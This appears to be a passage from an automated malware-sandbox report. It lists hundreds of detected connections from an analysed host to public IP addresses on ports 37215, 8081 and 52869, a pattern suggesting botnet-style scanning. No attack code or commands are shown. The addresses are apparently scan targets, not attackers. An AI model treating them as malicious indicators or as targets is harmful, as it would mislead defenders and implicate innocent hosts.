                      Source: unknownNetwork traffic detected: HTTP traffic on port 32796 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 46484 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51504 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59478 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59484 -> 52869
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50740 -> 52869
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.164.78.122:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.70.47.135:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 31.226.75.152:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.57.175.45:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 186.23.77.122:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.112.26.200:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.244.153.74:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.23.105.2:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 75.49.195.139:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.206.89.130:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.183.110.42:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 91.98.242.170:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.153.42.4:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 120.191.233.247:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.48.133.159:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.42.169.126:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.185.62.167:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.233.53.190:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 141.199.59.173:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.156.206.214:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 211.45.136.152:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.164.23.3:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 181.89.181.103:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.184.79.183:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.209.199.16:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.52.105.112:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.22.107.208:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.165.255.30:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.14.174.37:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.28.13.220:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.122.250.164:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.93.186.26:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.176.218.10:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.219.134.66:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.38.240.133:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.33.158.151:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 24.82.183.93:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.183.5.146:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.248.125.74:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.58.89.166:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.247.46.12:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.248.234.133:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.152.207.21:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.50.11.183:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 133.28.220.100:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.70.140.218:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.198.219.2:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 152.41.190.171:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 94.44.111.34:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.146.165.184:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.153.130.241:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.148.29.80:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.189.66.95:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.187.231.237:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.18.39.4:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 18.5.132.170:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.182.246.174:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.90.229.28:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.125.116.0:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.96.246.174:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.124.133.127:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.208.177.172:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.194.67.142:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.204.130.3:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 128.4.57.232:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 138.194.165.219:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.157.49.65:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 155.178.232.143:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.223.52.137:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 198.80.229.185:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.62.62.113:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.25.209.247:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.14.16.110:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.32.82.175:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 176.171.193.242:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.104.80.16:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.83.28.229:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.145.195.153:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.21.217.171:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.112.53.44:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.207.102.189:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.68.215.138:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.40.168.196:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.46.124.193:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.88.18.67:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.180.0.116:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.221.39.140:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.163.62.174:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.212.142.21:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 204.22.161.228:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.237.152.228:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.170.165.170:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.240.34.42:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.209.69.235:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.133.29.67:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 131.78.104.9:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 211.147.140.76:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.157.247.234:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.135.32.84:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.196.44.133:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 110.124.171.180:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 76.174.76.195:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 174.135.199.129:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.165.208.89:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.55.227.62:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 158.245.1.223:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 204.65.167.10:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.135.151.92:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 166.16.190.83:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.148.145.109:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.237.160.210:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 125.218.223.230:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.248.11.159:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 185.101.34.75:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.103.45.78:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.129.24.89:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.183.228.205:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 92.57.180.103:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 189.228.237.19:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.220.34.254:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 121.209.116.212:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.142.55.170:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.153.180.139:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.130.208.54:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.98.20.252:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.152.249.5:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 106.240.47.148:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.37.121.244:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.38.20.146:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.76.189.3:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 97.117.94.92:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 91.134.129.146:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.179.93.180:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.124.78.80:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 75.163.132.69:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.155.124.136:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 78.116.111.6:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.94.74.21:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.160.70.240:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.19.68.136:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.51.127.171:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.49.145.149:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 130.150.233.95:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.155.35.213:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 216.204.37.61:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.178.185.152:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.48.219.131:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.170.178.75:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 155.221.192.136:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.190.87.107:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 1.160.229.40:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 34.202.46.128:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 45.182.212.164:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 221.229.167.177:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.28.53.140:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.219.3.184:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.86.55.32:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.205.179.211:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.141.203.96:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.12.154.103:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 64.130.174.77:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 164.152.114.92:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.164.107.109:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.14.60.190:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.76.186.37:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 180.149.134.73:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.51.200.31:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.143.99.76:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 190.164.230.172:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 99.80.150.223:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 109.251.14.201:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.17.43.162:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 57.147.31.177:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.145.104.135:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 47.121.106.191:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 167.133.59.154:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.163.208.222:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 183.188.212.130:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.221.219.70:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 32.8.164.81:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.215.31.146:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.100.189.26:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.65.214.53:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.89.217.112:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.27.127.22:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.145.253.73:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.81.135.223:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.16.85.248:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.144.99.86:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.122.120.132:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.74.195.83:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.254.196.153:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.155.87.199:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 151.249.104.249:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.175.25.122:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.230.63.1:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.91.156.105:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 198.45.18.250:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.27.2.225:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.212.223.17:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.183.189.239:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.13.154.17:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 136.230.51.161:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.167.43.41:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.40.221.74:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 208.191.39.47:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 116.132.59.169:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 90.121.157.161:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.219.167.144:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.47.178.20:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 142.230.49.126:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 134.206.52.79:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.124.231.107:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.26.32.199:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.232.70.152:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.74.40.186:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.36.42.86:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.233.107.21:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.38.118.86:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.162.164.93:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.1.185.169:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.129.208.103:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.63.2.158:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.75.139.249:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 61.98.235.91:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.42.206.73:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.152.47.25:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.213.57.205:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.182.60.47:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.38.238.183:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.171.132.35:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.108.12.45:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 202.63.233.33:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.232.211.64:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.194.43.237:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 65.65.245.79:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 38.68.41.15:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.254.67.154:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.171.229.193:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.147.25.58:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.54.94.190:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.228.12.58:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 174.98.61.127:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.13.170.245:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.217.71.251:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.203.33.28:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.161.134.169:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 58.43.94.243:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.5.27.68:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 178.252.171.252:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.209.126.105:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 41.177.66.0:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 105.246.52.163:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.87.238.75:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 157.124.218.58:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26454 -> 197.64.18.222:37215
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 217.229.232.132:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 122.148.141.139:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 14.227.196.59:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 141.98.245.55:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 216.109.199.249:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 124.0.116.151:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 19.66.111.46:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 219.80.89.254:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 117.202.144.121:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 107.98.138.138:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 124.201.188.99:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 66.160.252.197:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 5.153.195.34:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 72.133.157.196:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 213.86.105.34:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 117.59.50.117:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 64.8.192.151:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 160.169.251.238:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 97.4.105.89:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 162.1.131.232:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 81.104.141.158:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 173.99.45.184:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 52.83.62.134:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 25.156.123.151:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 168.224.43.165:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 108.194.57.178:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 123.249.239.40:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 43.140.207.90:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 154.14.145.41:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 221.8.209.126:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 42.126.204.24:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 65.131.57.149:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 64.11.70.189:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 89.204.254.142:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 217.242.52.221:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 201.139.160.213:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 118.244.182.247:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 36.149.177.71:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 34.48.195.12:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 35.119.194.71:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 118.108.231.18:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 166.164.89.235:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 132.9.207.47:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 65.161.97.35:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 219.79.141.190:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 126.237.135.131:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 48.226.195.110:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 173.34.173.124:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 133.231.169.119:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 90.68.228.185:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 84.173.144.92:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 116.229.69.125:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 72.126.240.254:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 210.161.174.194:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 61.74.35.59:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 195.101.202.121:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 154.164.49.148:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 114.235.217.176:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 75.195.2.205:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 70.210.95.222:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 197.160.53.246:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 90.90.218.17:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 137.216.162.82:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 196.160.77.207:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 139.94.219.97:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 65.148.167.225:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 99.244.224.1:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 44.155.215.65:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 112.145.153.147:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 223.218.159.192:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 179.133.181.54:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 72.84.70.231:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 27.162.84.102:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 70.98.217.202:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 74.184.77.45:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 114.204.160.76:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 34.124.53.78:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 65.29.48.192:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 205.25.159.197:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 83.19.84.106:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 44.199.231.4:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 190.85.0.84:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 109.214.206.255:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 146.119.228.28:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 94.52.214.119:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 219.130.175.172:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 155.47.66.166:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 110.131.40.140:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 107.180.228.240:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 120.37.42.49:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 188.236.28.255:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 180.114.241.164:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 124.180.141.207:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 223.150.21.121:8081
                      Source: global trafficTCP traffic: 192.168.2.14:26710 -> 8.85.105.65:8081
